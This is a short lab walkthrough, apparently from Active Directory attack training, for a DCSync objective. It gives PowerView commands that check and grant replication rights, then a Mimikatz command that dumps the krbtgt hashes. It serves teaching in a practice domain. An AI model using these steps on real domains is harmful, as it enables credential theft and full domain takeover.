Obj 12 DCSync

Task - Check if student has Replication (DCSync) rights. If yes, execute the DCSync attack to pull hashes of the krbtgt user. If no, add the replication rights for the student and execute the DCSync

Check to see if the user has replication rights

We are going to start from an elevated shell, run invishell and load powerview.ps1

Now we can run the following command to see if the user has replication rights

Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "studentx"}

- IF USER DOES NOT HAVE REPLICATION RIGHTS -

We can add the replication rights to the user. We need to start a new process on the user machine, run invishell and load powerview.ps1

Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity studentx-Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

We can now go back to our other shell and check to see if we have replication rights now.

Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "studentx"}

Once we have replication rights for our user we can use the DCSync attack to dump the creds of krbtgt user

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Last updated